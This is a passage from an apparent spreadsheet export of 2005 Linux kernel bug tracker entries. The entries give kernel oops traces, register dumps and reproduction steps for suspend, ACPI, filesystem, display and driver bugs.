[c00000000000c378] .init+0x1e4/0x408 [c00000003ffd3f90] [c000000000013210] .kernel_thread+0x4c/0x68 kmem_cache_create: Early error in slab inet_peer_cache kernel BUG in kmem_cache_create at mm/slab.c:1516! Oops: Exception in kernel mode, sig: 5 [#1] SMP NR_CPUS=32 NUMA PSERIES LPAR Modules linked in: NIP: C000000000081E80 XER: 00000000 LR: C000000000081E7C CTR: 00000000000D0274 REGS: c00000003ffd3970 TRAP: 0700 Not tainted (2.6.13-rc3-mm2-autokern1) MSR: 8000000000029032 EE: 1 PR: 0 FP: 0 ME: 1 IR/DR: 11 CR: 24004022 DAR: 0000000000000280 DSISR: c00000003ffd3b40 TASK: c00000000418d7e0[1] 'swapper' THREAD: c00000003ffd0000 CPU: 1 GPR00: C000000000081E7C C00000003FFD3BF0 C000000000647D10 000000000000003D GPR04: 8000000000009032 FFFFFFFFFFFFFFFF 5F63616368650D0A C000000000567E28 GPR08: 0000000000000000 C00000000056A590 C000000000650C30 C000000000650B50 GPR12: 00000000000D0274 C000000000551800 0000000000000000 0000000000000000 GPR16: 0000000000000000 0000000000000000 0000000000000000 0000000000000000 GPR20: 0000000000230000 0000000000000000 0000000003A10000 C0000000004A4D58 GPR24: 0000000000002000 C000000000646208 C00000000052AC18 0000000000008000 GPR28: 0000000000000020 0000000000000000 C000000000576C88 0000000000000040 NIP [c000000000081e80] .kmem_cache_create+0xd4/0x8a8 LR [c000000000081e7c] .kmem_cache_create+0xd0/0x8a8 Call Trace: [c00000003ffd3bf0] [c000000000081e7c] .kmem_cache_create+0xd0/0x8a8 (unreliable) [c00000003ffd3ce0] [c0000000004fc154] .inet_initpeers+0x90/0x114 [c00000003ffd3de0] [c0000000004fc1f0] .ip_init+0x18/0x34 [c00000003ffd3e60] [c0000000004fcba4] .inet_init+0x14c/0x4a8 [c00000003ffd3f00] [c00000000000c378] .init+0x1e4/0x408 [c00000003ffd3f90] [c000000000013210] .kernel_thread+0x4c/0x68 Instruction dump: 3128ffff 7c094110 21670000 7d2b3914 7c0b4838 2c0b0000 4182001c e87e8168 e89e8170 7ee5bb78 4bfc7461 60000000 &lt;0fe00000&gt; 7b006fe3 41820008 0b150000 &lt;0&gt;Kernel panic - not syncing: Fatal exception in interrupt</t>
  </si>
  <si>
    <t>acpi_aml-interpreter</t>
  </si>
  <si>
    <t>Page tables corrupted during resume on x86-64</t>
  </si>
  <si>
    <t>2.6.13-rc3-mm[1-3], 2.6.13-mm[1-3], 2.6.14-rc1</t>
  </si>
  <si>
    <t>2005-07-28 14:42 UTC</t>
  </si>
  <si>
    <t>2006-02-16 05:29 UTC</t>
  </si>
  <si>
    <t>Distribution: SuSE 9.3 Hardware Environment: Asus L5D (Athlon 64, nForce3, 768 MB of RAM) Problem Description: If the box is resumed from disk on battery power (after being started on battery power), it hangs solid after or during the restoration of the image. On AC power everything is OK. Steps to reproduce: Suspend the box to disk, disconnect the power supply from it and try to resume. It is reproducible 100% of the time.</t>
  </si>
  <si>
    <t>Kernel OOPs encountered while running the BASHMEMORY Test suite</t>
  </si>
  <si>
    <t>2005-07-29 06:59 UTC</t>
  </si>
  <si>
    <t>2006-03-31 05:54 UTC</t>
  </si>
  <si>
    <t>Distribution: RHEL 4 Update 1 --------------------------- Hardware Environment: SMP, 2 way Intel(R) Xeon(TM) CPU 2.40GHz, 1.5 GB RAM Network Interface (Tigon3) Disk I/O SCSI storage controller: usion-MPT Dual Ultra320 --------------------------- Software Environment: Linux x225b.in.ibm.com 2.6.13-rc3-mm2 #1 Wed Jul 27 17:43:05 IST 2005 i686 i686 i386 GNU/Linux ------------------------------ Problem Description: While executing the BASHMEMORY test encountered this OOPs message ------------[ cut here ]------------ kernel BUG at &lt;bad filename&gt;:48361! invalid operand: 0000 [#1] SMP last sysfs file: Modules linked in: ipv6 ipt_REJECT ipt_state ip_conntrack iptable_filter ip_tables button battery ac i2e CPU: 3 EIP: 0060:[&lt;c016f52a&gt;] Not tainted VLI EFLAGS: 00010246 (2.6.13-rc3-mm2-I) EIP is at submit_bh+0x16a/0x180 eax: 00004005 ebx: e3bc8754 ecx: 00000000 edx: e3bc8754 esi: 00000003 edi: 000000f6 ebp: 00000200 esp: f7ddbe7c ds: 007b es: 007b ss: 0068 Process kjournald (pid: 1122, threadinfo=f7ddb000 task=f7c35030) Stack: 00d81040 00000000 00000008 00000000 00000000 e3bc8754 00000001 e3bc8754 00000003 000000f6 00000200 c016f5fc c5fe8000 00000000 c5f92200 e69028c0 f78e2880 c01e43cf 00000000 c5eed030 00000000 c0515855 c0513d36 f78e28bc Call Trace: [&lt;c016f5fc&gt;] ll_rw_block+0xbc/0xc0 [&lt;c01e43cf&gt;] journal_commit_transaction+0x34f/0xff0 [&lt;c0515855&gt;] _spin_unlock_irq+0x5/0x10 [&lt;c0513d36&gt;] schedule+0x656/0xd40 [&lt;c013aff0&gt;] autoremove_wake_function+0x0/0x50 [&lt;c0515739&gt;] _spin_lock_irqsave+0x9/0x10 [&lt;c012ee56&gt;] try_to_del_timer_sync+0x46/0x50 [&lt;c01e72b0&gt;] kjournald+0xa0/0x220 [&lt;c013aff0&gt;] autoremove_wake_function+0x0/0x50 [&lt;c013aff0&gt;] autoremove_wake_function+0x0/0x50 [&lt;c0104022&gt;] ret_from_fork+0x6/0x14 [&lt;c01e7200&gt;] commit_timeout+0x0/0x10 [&lt;c01e7210&gt;] kjournald+0x0/0x220 [&lt;c0102465&gt;] kernel_thread_helper+0x5/0x10 Code: 7d 10 00 b8 a1 ff ff ff 0f 49 44 24 10 89 44 24 10 89 e8 e8 29 09 00 00 8b 44 24 10 83 c4 1c 5b 5 Linux version 2.6.13-rc3-mm2-II (root@x225b.in.ibm.com) (gcc version 3.4.3 20050227 (Red Hat 3.4.3-22.5 ----------------</t>
  </si>
  <si>
    <t>Dual-head not working correctly with Matrox g550 in 2.6.13-rc[34]</t>
  </si>
  <si>
    <t>2.6.13-rc[34]</t>
  </si>
  <si>
    <t>2005-07-29 08:17 UTC</t>
  </si>
  <si>
    <t>2005-08-29 03:43 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian Unstable Hardware Environment: AMD Sempron 2800+, Matrox G550 Software Environment: X related packages are version 6.8.2.dfsg.1-4 Problem Description: I have a dual-head setup with two monitors using Matrox G550. The primary monitor is using 1400x1050 resolution and the secondary is to the right of the primary with 1024x768 resolution. With 2.6.13-rc1 (and 2.6.12.1) the system works fine. With 2.6.13-rc3 and -rc4 only the primary monitor is active, and it functions as the secondary monitor (with 1024x768 resolution and mouse cursor has to be moved to the right from the initial position to "get there"). Initially I thought that the problem was caused by the new Xorg packages in Debian unstable because I could not fathom how the kernel could have anything to do with such a problem. But then I tried the same X setup with another kernel versions and the setup works consistently with 2.6.13-rc1 and always fails with 2.6.13-rc3 and -rc4 (-rc2 failed to compile). If I modify xorg.conf to use only the primary monitor, then it works correctly with -rc[34]. Steps to reproduce: Boot with 2.6.13-rc[34], run startx and only the primary monitor gets an image, and that is the image that should be on the secondary monitor.</t>
  </si>
  <si>
    <t>Silent failure if CONFIG_ALTIVEC misconfigured</t>
  </si>
  <si>
    <t>2.6.12+</t>
  </si>
  <si>
    <t>2005-07-30 05:12 UTC</t>
  </si>
  <si>
    <t>Michal Ostrowski</t>
  </si>
  <si>
    <t>2005-08-21 06:13 UTC</t>
  </si>
  <si>
    <t>Distribution: Hardware Environment: ppc970 Software Environment: Problem Description: Steps to reproduce: boot a kernel without CONFIG_ALTIVEC with a root file-system whose binaries use altivec. If init=/bin/bash, there will be</t>
  </si>
  <si>
    <t>Wish for inclusion of SATA ATAPI support in future upstream releases</t>
  </si>
  <si>
    <t>2005-07-30 17:07 UTC</t>
  </si>
  <si>
    <t>Alexander Toresson</t>
  </si>
  <si>
    <t>2006-07-28 23:33 UTC</t>
  </si>
  <si>
    <t>*.events blocked unless ec_burst=1</t>
  </si>
  <si>
    <t>2.6.13-rc6</t>
  </si>
  <si>
    <t>2005-08-01 10:05 UTC</t>
  </si>
  <si>
    <t>2008-01-24 23:16 UTC</t>
  </si>
  <si>
    <t>4535 5713</t>
  </si>
  <si>
    <t>Distribution:ubuntu 5.04 Hardware Environment:laptop nv5000 Software Environment:kernel2.6.13-rc4-mm1+acpi Problem Description: computer frees on entering mem sleep.</t>
  </si>
  <si>
    <t>Kernel OOPs while running Files System Stress on JFS</t>
  </si>
  <si>
    <t>2.6.13-rc4-mm1</t>
  </si>
  <si>
    <t>2005-08-02 23:54 UTC</t>
  </si>
  <si>
    <t>2005-09-23 11:20 UTC</t>
  </si>
  <si>
    <t>4963 4986</t>
  </si>
  <si>
    <t>Distribution: SLES 9 SP1 -------------------------------- Hardware Environment: SMP, 2 way Xeon TM 2.8GHz, 1.5G RAM Network Interface (Tigon3) Disk I/O SCSI storage controller: IBM server RAID -------------------------------- Software Environment: Linux x235b 2.6.13-rc4-mm1-II #1 PREEMPT Tue Aug 2 08:26:47 PDT 2005 i686 i686 i386 GNU/Linux -------------------------------- Problem Description: Encountered this OOps message while Running FSstress on JFS file system PREEMPT SMP DEBUG_PAGEALLOC last sysfs file: /kernel/crash_notes Modules linked in: CPU: 1 EIP: 0060:[&lt;c024fbfc&gt;] Not tainted VLI EFLAGS: 00010202 (2.6.13-rc4-mm1-I) EIP is at txCommit+0x16c/0x300 eax: d0a6ab74 ebx: d0a6ab18 ecx: f3f5142c edx: d2610108 esi: d0a6ad44 edi: 0004e1f6 ebp: eb57fe18 esp: eb57fda8 ds: 007b es: 007b ss: 0068 Process fsstress (pid: 16597, threadinfo=eb57e000 task=eb509030) Stack: d0a6adfc eb57fdbc c04986c9 eb57fdbc 00000001 00000000 f883ef08 f7e2c180 00000612 00000612 00000000 f7e2c180 f5e94800 00000001 eb57fe40 000ec454 00000000 00000000 00000000 eb57fe18 c024ef8b 00000000 00000001 004b119a Call Trace: [&lt;c0103fcb&gt;] show_stack+0xab/0xc0 [&lt;c0104164&gt;] show_registers+0x164/0x1d0 [&lt;c01043a2&gt;] die+0x122/0x1c0 [&lt;c04996dc&gt;] do_page_fault+0x3dc/0x61d [&lt;c0103c53&gt;] error_code+0x4f/0x54 [&lt;c023044b&gt;] jfs_commit_inode+0x10b/0x110 [&lt;c02304a4&gt;] jfs_write_inode+0x54/0x70 [&lt;c018be94&gt;] write_inode+0x44/0x50 [&lt;c018bfbf&gt;] __sync_single_inode+0x11f/0x230 [&lt;c018c14f&gt;] __writeback_single_inode+0x7f/0x150 [&lt;c018c408&gt;] generic_sync_sb_inodes+0x1e8/0x300 [&lt;c018c54d&gt;] sync_sb_inodes+0x2d/0x40 [&lt;c018c6a7&gt;] sync_inodes_sb+0x77/0x90 [&lt;c018c7d7&gt;] __sync_inodes+0xd7/0xf0 [&lt;c018c80e&gt;] sync_inodes+0x1e/0x50 [&lt;c0167982&gt;] do_sync+0x22/0x80 [&lt;c01679f2&gt;] sys_sync+0x12/0x20 [&lt;c01030ff&gt;] sysenter_past_esp+0x54/0x75 Code: 89 41 1a 66 c7 43 50 00 00 b8 78 6b 51 c0 66 c7 43 4e 00 00 e8 c6 8a 24 00 8d 86 30 fe ff ff 8b 9</t>
  </si>
  <si>
    <t>/proc/acpi/button/ is missing in 2.6.13-rc5</t>
  </si>
  <si>
    <t>2.6.13-rc5</t>
  </si>
  <si>
    <t>2005-08-03 00:01 UTC</t>
  </si>
  <si>
    <t>Klaus S. Madsen</t>
  </si>
  <si>
    <t>2005-08-10 18:07 UTC</t>
  </si>
  <si>
    <t>Distribution: Gentoo Hardware Environment: Compaq Armada M700 Problem Description: The directory /proc/acpi/button no longer exists i 2.6.13-rc5. This is a problem, as it complicates acpi-scripts which suspend the laptop when the lid is closed (it is very nice to know of the button event you receive is because the lid is closed or opened). Reverting the patch at http://www.kernel.org/git/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commit;h=bd4698dad3023ae137b366c736e29ca6eaf3b9f7 solves the problem, but that patch also contains a bug-fix.</t>
  </si>
  <si>
    <t>Power off stops</t>
  </si>
  <si>
    <t>2005-08-03 09:41 UTC</t>
  </si>
  <si>
    <t>zilvinas</t>
  </si>
  <si>
    <t>2005-08-10 18:08 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian/Unstable Hardware Environment: Compaq EVO 800N Notebook, with ATI Technologies Inc Radeon Mobility M7, RAM: 512MB Software Environment: kernel .config: http://www.gemtek.lt/~zilvinas/config-2.6.13-rc5 Linux swoop 2.6.12 #1 Sun Jun 19 16:06:12 EEST 2005 i686 GNU/Linux Gnu C 4.0.2 Gnu make 3.80 binutils 2.16.1 util-linux 2.12p mount 2.12p module-init-tools 3.2-pre1 e2fsprogs 1.38 reiserfsprogs 3.6.19 reiser4progs line xfsprogs 2.6.36 pcmcia-cs 3.2.5 nfs-utils 1.0.7 Linux C Library 2.3.2 Dynamic linker (ldd) 2.3.2 Procps 3.2.5 Net-tools 1.60 Console-tools 0.2.3 Sh-utils 5.2.1 udev 064 Modules Loaded prism54 radeon drm cpufreq_ondemand acpi_cpufreq freq_tab le pcmcia ipv6 irtty_sir sir_dev irda crc_ccitt floppy 8250_pnp 8250 serial_core pl2303 usbserial ehci_hcd ohci_hcd yenta_socket rsrc_nonstatic pcmcia_core ipw2 200 firmware_class ieee80211 ieee80211_crypt snd_intel8x0 snd_ac97_codec snd_pcm _oss snd_mixer_oss snd_pcm snd_timer snd soundcore snd_page_alloc intel_agp agpg art deflate zlib_deflate zlib_inflate twofish serpent aes_i586 blowfish des sha2 56 sha1 md5 crypto_null dm_mod ide_cd cdrom Problem Description: Impossible to power off notebook. Doing 'halt' - power off process stops right before power off HD (services are already stopped, HD disk partions unmounted). Sys-rq T - shows a lot of output (Can't capture as this notebook has no serial port). Last backtrace shows complete_wait() - don't rememmber, and there are some USB calls down the backtrace. At the time of poweroff I had USB mouse connected. If there is need I can write down backtrace printed by Sysrq-T Steps to reproduce: Run as root: # halt</t>
  </si>
  <si>
    <t>inotify - wrong helptext</t>
  </si>
  <si>
    <t>2005-08-04 02:36 UTC</t>
  </si>
  <si>
    <t>Gerd Fleischer</t>
  </si>
  <si>
    <t>2005-08-04 06:36 UTC</t>
  </si>
  <si>
    <t>Just wanted to say, that the help text for inotify i.e. in make menuconfig still refers to /dev/inotify.</t>
  </si>
  <si>
    <t>make xconfig wont work if $QTDIR=/usr</t>
  </si>
  <si>
    <t>2005-08-04 23:33 UTC</t>
  </si>
  <si>
    <t>Jonathan Dunlap</t>
  </si>
  <si>
    <t>2005-11-24 09:00 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: ? Distribution: LFS Problem Description: If QT is installed in /usr, make xconfig cannot find QT. Steps to reproduce: Install qt with prefix=/usr set $QTDIR=/usr Steps to work around: link /opt/qt/bin to /usr/bin link /opt/qt/lib to /usr/lib link /opt/qt/include /usr/include/qt (or whatever -headerdir was passed to qt ./configure) set $QTDIR to /opt/qt</t>
  </si>
  <si>
    <t>fan always on after waking from swsusp</t>
  </si>
  <si>
    <t>2005-08-04 23:45 UTC</t>
  </si>
  <si>
    <t>2006-07-11 09:38 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: swsusp never worked for me before 2.6.13-rc3 or so, and I noticed the fan problem alongside swsusp working. Distribution: Debian testing Hardware Environment: TP 600X, latest BIOS Software Environment: dmidecode etc. output (from a slightly different kernel, but same DSDT/BIOS) is at Bug #4989 Problem Description: After rebooting from swsusp, the fan stays on no matter what I do. Normally the fan behaves well (turning on only when the temperatures exceed trip points). After the reboot, the system knows the temperatures are low enough, and that no active cooling is reported: Thermal 1: ok, 40.0 degrees C Thermal 2: ok, 38.0 degrees C Thermal 3: ok, 34.0 degrees C Thermal 4: ok, 36.0 degrees C But /proc/acpi/fan/FN*/state shows 'on' for all the fans (I think there's only one actual fan, but as far as the ACPI layer imagines it there may be &gt;1), and they are definitely on and noisy. The air coming out is quite cool. Echoing '0' or 'off' to the 'state' file doesn't do anything. Reloading all the ACPI modules (fan, battery, etc.) doesn't help. Steps to reproduce: Boot into X, swsusp, then reboot. Listen for fan!</t>
  </si>
  <si>
    <t>nForce 2 doesn't power-off</t>
  </si>
  <si>
    <t>2.6.13-rc3-git4</t>
  </si>
  <si>
    <t>2005-08-05 14:13 UTC</t>
  </si>
  <si>
    <t>Martin Drab</t>
  </si>
  <si>
    <t>2005-08-06 07:12 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.13-rc2 Distribution: Hardware Environment: GB 7NNXP (nForce2) Software Environment: Problem Description: Halt (or &lt;Crtl&gt;&lt;SysRq&gt;&lt;O&gt;) doesn't do the actual power-off. It gets through all the shutdown procedure, even the disks park, but then when the actual power-off is to be done, nothing happens. The regression is somewhere between 2.6.13-rc2 and 2.6.13-rc3-git4. In 2.6.13-rc5-git2 it is still not fixed. Steps to reproduce:</t>
  </si>
  <si>
    <t>ehci-hcd does not work for external DVD-RW "Freecom Classic"</t>
  </si>
  <si>
    <t>2005-08-06 03:03 UTC</t>
  </si>
  <si>
    <t>Leonid Kof</t>
  </si>
  <si>
    <t>2005-08-26 10:23 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.3 I did not try kernels 2.6.4-2.6.10, so I cannot exactly identify the last bugfree kernel version. The DVD-RW worked on my old laptop with Debian-testing/2.6.3, it does not work on the new one with SuSE 9.3/2.6.11 Distribution: SuSE 9.3 Hardware Environment: Laptop Samsung X20, Pentium M 1.6 GHz, 2GB RAM, USB Controller: Intel Corporation 82801FB/FBM/FR/FW/FRW, External USB2 DVD-RW "Freecom Classic" Software Environment: SuSE 9.3 with kernel 2.6.11.4-21.7 Problem Description: When a USB2 burner is plugged just after boot, it works fine. After unplugging and re-plugging it stops responding. SCSI driver says something like "scsi1 (0:0): rejecting I/O to offline device". (The relevant part of /var/log/messages is attached to the bug report) Steps to reproduce: Boot with USB2 burner unplugged. Plug the USB2 burner Test whether it reacts (I tried "eject sr0") Unplug the USB2 burner. Plug the USB2 burner again. "eject sr0" does not work any more: Either it outputs "cannot open /dev/sr0" or just hangs. When eject hangs, the system refuses to hybernate. "kill -9" does not kill hanging "eject". Comments: 1. The bug seems to be related to the bugs #4373 and #3007, but is not quite the same. 2. SuSE seems to be aware of the problem: http://portal.suse.com/sdb/de/2004/01/USB_2_0.html, their workaround does not work for me. (The SuSE page ist in german. If necessary, I can translate it for you) 3. Once I could make it run with a sequence of loading/unloading uhci-hcd, plugging/unplugging the DVD-RW and loading/unloading ehci-hcd. Unfortunately, I cannot reproduce the right sequence.</t>
  </si>
  <si>
    <t>moxa tty driver name is wrong and conflicts with legacy ptys</t>
  </si>
  <si>
    <t>2005-08-06 11:46 UTC</t>
  </si>
  <si>
    <t>2005-09-03 08:27 UTC</t>
  </si>
  <si>
    <t>drivers/char/moxa.c contains: moxaDriver-&gt;name = "ttya"; However, Documentation/devices.txt shows a different name for this driver: 172 char Moxa Intellio serial card 0 = /dev/ttyMX0 First Moxa port 1 = /dev/ttyMX1 Second Moxa port ... 127 = /dev/ttyMX127 128th Moxa port (there is also /dev/moxactl, but it is a separate issue) An even worse problem is that the "ttya" name conflicts with the legacy pty driver - pty slaves with numbers 176...185 have names "ttya0"..."ttya9". Therefore, if CONFIG_LEGACY_PTYS is enabled in the kernel configuration (it is enabled in i386 defconfig), and CONFIG_LEGACY_PTY_COUNT is sufficiently large (i386 defconfig has 256), names of the first 10 ports of moxa driver clash with legacy pty slaves; 2.6.12 seems to be silent about this and just ignores duplicate registrations. So these 10 ports do not appear in sysfs properly and cannot be used normally in an udev-based system. I suggest changing the driver name to "ttyMX" to fix this problem; this will also make udev create correct device names for these devices with the default configuration.</t>
  </si>
  <si>
    <t>rp_filter documentation error in Kconfig</t>
  </si>
  <si>
    <t>2.6  2.4</t>
  </si>
  <si>
    <t>2005-08-07 11:24 UTC</t>
  </si>
  <si>
    <t>Adrian Buciuman</t>
  </si>
  <si>
    <t>2007-05-17 15:17 UTC</t>
  </si>
  <si>
    <t>can't resume from swsusp with amd64-agp module loaded</t>
  </si>
  <si>
    <t>2005-08-07 15:15 UTC</t>
  </si>
  <si>
    <t>Michal Schmidt</t>
  </si>
  <si>
    <t>2006-01-04 22:49 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: long-standing bug; probably never worked Distribution: unofficial Debian Sid for AMD64 Hardware Environment: Athlon 64 FX-53, Asus A8V Deluxe Software Environment: gcc (GCC) 4.0.2 20050725 (prerelease) (Debian 4.0.1-3.0.0.1.gcc4) Problem Description: When amd64-agp is loaded as a module and swsuspend is used, a spontaneous reboot happens on resume. Resume works fine if amd64-agp is built-in into the kernel. Originally reported to LKML: http://marc.theaimsgroup.com/?l=linux-kernel&amp;m=112180650210831&amp;w=2 A very similar problem was discovered and fixed for i386 in April 2004: http://marc.theaimsgroup.com/?l=linux-kernel&amp;m=108310336904458&amp;w=2 Steps to reproduce: Boot with "init=/bin/sh". mount -t sysfs sys sys swapon -a modprobe amd64-agp echo disk &gt; /sys/power/state Attempt to resume. Notice the sudden reboot after the saved image is successfully loaded from disk.</t>
  </si>
  <si>
    <t>scheduling while atomic on resume (swsuspend)</t>
  </si>
  <si>
    <t>2005-08-08 03:29 UTC</t>
  </si>
  <si>
    <t>Jens Hoffmann</t>
  </si>
  <si>
    <t>2006-01-18 05:25 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian sid Hardware Environment: motherboard: ASRock K7V88 (VIA KT880) Problem Description: [Note: this is _not_ a regression from previous kernel versions. swsuspend never worked on this pc before, although the problems were different for other kernel versions, like hard lockups etc..] After resume from swsuspend (suspend to disk) the kernel spills out a big list of errors: scheduling while atomic: hibernate/0x00000001/3806 [&lt;c03298a6&gt;] schedule+0x566/0x630 [&lt;c011d2d6&gt;] call_console_drivers+0x146/0x170 [&lt;c0126195&gt;] __mod_timer+0xd5/0xf0 [&lt;c032a290&gt;] schedule_timeout+0x50/0xc0 [&lt;c0126c90&gt;] process_timeout+0x0/0x10 [&lt;c02314c0&gt;] ps2_sendbyte+0x110/0x150 [&lt;c01330b0&gt;] autoremove_wake_function+0x0/0x60 [&lt;c0231794&gt;] ps2_command+0xc4/0x340 [&lt;c02a0d48&gt;] atkbd_probe+0x38/0x130 [&lt;c02a17d3&gt;] atkbd_reconnect+0xc3/0x160 [&lt;c022ea2c&gt;] serio_reconnect_driver+0x3c/0x50 [&lt;c022fd43&gt;] serio_resume+0x13/0x30 [&lt;c0243c4e&gt;] resume_device+0x5e/0xe0 [&lt;c0243d62&gt;] dpm_resume+0x92/0xb0 [&lt;c0243d91&gt;] device_resume+0x11/0x20 [&lt;c013dcd8&gt;] finish+0x8/0x50 [&lt;c013de73&gt;] pm_suspend_disk+0x63/0xb0 [&lt;c013bc08&gt;] enter_state+0x58/0x80 [&lt;c013bd69&gt;] state_store+0x99/0xb4 [&lt;c019d097&gt;] flush_write_buffer+0x37/0x40 [&lt;c019d0fb&gt;] sysfs_write_file+0x5b/0x90 [&lt;c0161385&gt;] vfs_write+0xd5/0x1b0 [&lt;c016152b&gt;] sys_write+0x4b/0x80 [&lt;c0103257&gt;] sysenter_past_esp+0x54/0x75 scheduling while atomic: hibernate/0x00000001/3806 [&lt;c03298a6&gt;] schedule+0x566/0x630 [&lt;c032a298&gt;] schedule_timeout+0x58/0xc0 [&lt;c032a290&gt;] schedule_timeout+0x50/0xc0 [&lt;c0126c90&gt;] process_timeout+0x0/0x10 [&lt;c023182d&gt;] ps2_command+0x15d/0x340 [&lt;c01330b0&gt;] autoremove_wake_function+0x0/0x60 [&lt;c02a0d48&gt;] atkbd_probe+0x38/0x130 [&lt;c02a17d3&gt;] atkbd_reconnect+0xc3/0x160 [&lt;c022ea2c&gt;] serio_reconnect_driver+0x3c/0x50 [&lt;c022fd43&gt;] serio_resume+0x13/0x30 ... [see attached dmesg output for full log] hibernate is a small shell script: &gt;#!/bin/sh &gt;[[ -f /sys/power/state ]] || exit 0 &gt; &gt;on_suspend() { &gt; rmmod via_rhine &gt; rmmod 8139too &gt; rmmod ehci_hcd &gt; rmmod uhci_hcd &gt; #/etc/init.d/mysql stop &gt;} &gt;on_resume() { &gt; modprobe via_rhine &amp;&amp; ifup eth0 &gt; modprobe 8139too &amp;&amp; ifup eth1 &gt; modprobe ehci_hcd &gt; modprobe uhci_hcd &gt; #/etc/init.d/mysql start &gt;} &gt; &gt;on_suspend &gt;sleep 3 &gt;echo "disk" &gt; /sys/power/state &gt;sleep 6 &gt;on_resume &gt; &gt;exit 0 Steps to reproduce: happens always on resume. kind regards, J. Hoffmann</t>
  </si>
  <si>
    <t>battery are not present</t>
  </si>
  <si>
    <t>kernel 2.6.13-rc6</t>
  </si>
  <si>
    <t>2005-08-08 13:45 UTC</t>
  </si>
  <si>
    <t>2005-09-07 20:19 UTC</t>
  </si>
  <si>
    <t>Distribution:kubuntu 5.04 Hardware Environment:laptop samsung nv5000 Software Environment:kernel+acpi Problem Description: With kernel 2.6.13-rc6 battery are not present but they are pluget with kernel 2.6.13-rc5-mm1 it worket.</t>
  </si>
  <si>
    <t>Encountered this kernel Panic on system boot up</t>
  </si>
  <si>
    <t>2.6.13-rc5-mm1</t>
  </si>
  <si>
    <t>2005-08-09 05:59 UTC</t>
  </si>
  <si>
    <t>2005-10-11 05:12 UTC</t>
  </si>
  <si>
    <t>Distribution: RHEL 4 UP 1 ---------------------------------- Hardware Environment: SMP, 2 way Intel(R) Xeon(TM) CPU 2.40GHz, 1.5 GB RAM Network Interface (Tigon3) Disk I/O SCSI storage controller: usion-MPT Dual Ultra320 ---------------------------------- Software Environment: Linux Kernel: 2.6.13-rc5 + 2.6.13-rc5-mm1 ---------------------------------- Problem Description: On building kernel 2.6.13-rc5-mm1 with the existing config file[worked with earlier kernels]. Encountered this Kernel Panic with the message " Unable to handle kernel paging request at virtual address 00200200. -------------- Unable to handle kernel paging request at virtual address 00200200 printing eip: c03648d0 *pde = 00000000 Oops: 0000 [#1] SMP last sysfs file: Modules linked in: CPU: 0 EIP: 0060:[&lt;c03648d0&gt;] Not tainted VLI EFLAGS: 00010246 (2.6.13-rc5-mm1-I) EIP is at attribute_container_unregister+0x30/0x70 eax: c5e9a02c ebx: c5e9a024 ecx: 00000000 edx: 00200200 esi: 00000000 edi: 00000000 ebp: 00000000 esp: c5de1fa4 ds: 007b es: 007b ss: 0068 Process swapper (pid: 1, threadinfo=c5de1000 task=c5de0a70) Stack: c5e9a000 c5de1000 c03b6c9b c066d114 c065b356 c063aa13 c0660bc2 00000000 c5de1000 c5de1000 00000000 00000000 c01003ae 0000007b 0000007b ffffffff c0100310 c0102405 00000000 00000000 00000000 448b0000 e8c13c24 Call Trace: [&lt;c03b6c9b&gt;] spi_release_transport+0xb/0x1a [&lt;c065b356&gt;] ahd_linux_init+0x76/0x90 [&lt;c063aa13&gt;] do_initcalls+0x53/0xc0 [&lt;c0660bc2&gt;] netfilter_init+0xa2/0xd0 [&lt;c01003ae&gt;] init+0x9e/0x1e0 [&lt;c0100310&gt;] init+0x0/0x1e0 [&lt;c0102405&gt;] kernel_thread_helper+0x5/0x10 Code: 24 89 c3 89 74 24 04 be f0 ff ff ff e8 6a f6 1a 00 f0 ff 0d 20 01 5c c0 0f 88 ad 04 00 00 8d 43 0 &lt;0&gt;Kernel panic - not syncing: Attempted to kill init! ------------------------------------- Will attach Serial Console out put and Config file used</t>
  </si>
  <si>
    <t>ibm_acpi hotkeys for ThinkPad 600X</t>
  </si>
  <si>
    <t>2005-08-09 08:53 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian/sarge Hardware Environment: IBM Thinkpad R40 Problem Description: I use the following in my startup scripts: echo "Enable Thinkpad Hotkeys for ACPI" test -f /proc/acpi/ibm/hotkey &amp;&amp; echo enable &gt; /proc/acpi/ibm/hotkey with 2.6.13-rc6 there is no file /proc/acpi/ibm/hotkey, but the documentation in Documentation/ibm-acpi.txt still refers to that file. Relevant dmesg: # dmesg | grep ibm ibm_acpi: Using generic hotkey driver</t>
  </si>
  <si>
    <t>Fast running system clock with IO-APIC enabled</t>
  </si>
  <si>
    <t>2.6.13-rc6 - 2.6.17</t>
  </si>
  <si>
    <t>2005-08-09 18:53 UTC</t>
  </si>
  <si>
    <t>Cal Peake</t>
  </si>
  <si>
    <t>2008-08-11 09:02 UTC</t>
  </si>
  <si>
    <t>Distribution: Slackware 10.0 Hardware Environment: Athlon XP 2500+ (Barton, 1.83 GHz), MSI K7N2 nForce2 mobo Software Environment: N/A Problem Description: The system clock gains almost a second every two minutes resulting in the clock running about 11 minutes fast at the end of a 24 hour period (time syncs are done every 24 hrs). Steps to reproduce: Build the kernel with IO-APIC enabled.</t>
  </si>
  <si>
    <t>potential IndexField bug :battery charging not indicated-Compaq armada M300</t>
  </si>
  <si>
    <t>2.6.13-rc5-git3</t>
  </si>
  <si>
    <t>2005-08-10 01:44 UTC</t>
  </si>
  <si>
    <t>2007-01-15 08:45 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian Sarge Hardware Environment: Compaq armada M300 Notbook Software Environment: Problem Description: The discharged battery is said to charge at zero rate. Steps to reproduce: Discharge your battery, plug power cable in. max@armada:~$ date Fri Aug 5 13:40:24 CEST 2005 max@armada:~$ acpi -V Battery 1: charging, 32%, charging at zero rate - will never fully charge. Thermal 1: ok, 29.0 degrees C AC Adapter 1: on-line max@armada:~$ date Fri Aug 5 13:53:03 CEST 2005 max@armada:~$ acpi -V Battery 1: charging, 56%, charging at zero rate - will never fully charge. Thermal 1: ok, 33.0 degrees C AC Adapter 1: on-line</t>
  </si>
  <si>
    <t>2005-08-10 03:52 UTC</t>
  </si>
  <si>
    <t>2005-10-11 04:58 UTC</t>
  </si>
  <si>
